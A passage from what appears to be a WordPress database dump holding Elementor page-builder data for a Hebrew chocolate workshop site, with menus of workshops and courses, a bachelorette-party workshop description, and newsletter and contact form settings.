5\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"61c45866\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2e9becfa\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3a36cf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f6f68b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e887a15\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"374c003\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37447efb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"60d0c953\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"7dfe3d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"11596977\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53b6941c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6eef024e\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1013,199,'_elementor_version','0.4'),(1015,207,'_wp_page_template','elementor_header_footer'),(1016,207,'_elementor_edit_mode','builder'),(1017,207,'_elementor_template_type','post'),(1018,207,'_elementor_data','[{\"id\":\"5ae558de\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"76867a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"6b7a424b\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"29eb19f8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"859196c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"72d55618\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"407e28c0\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"415b3ee2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6383ac34\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55e4ccad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cc23117\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"65d5b2bb\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3453d936\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2e2fb1ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"489f7aa8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"1507f0f7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25c3fc17\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b29f897\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"12851db1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28303ac7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"725a935c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa 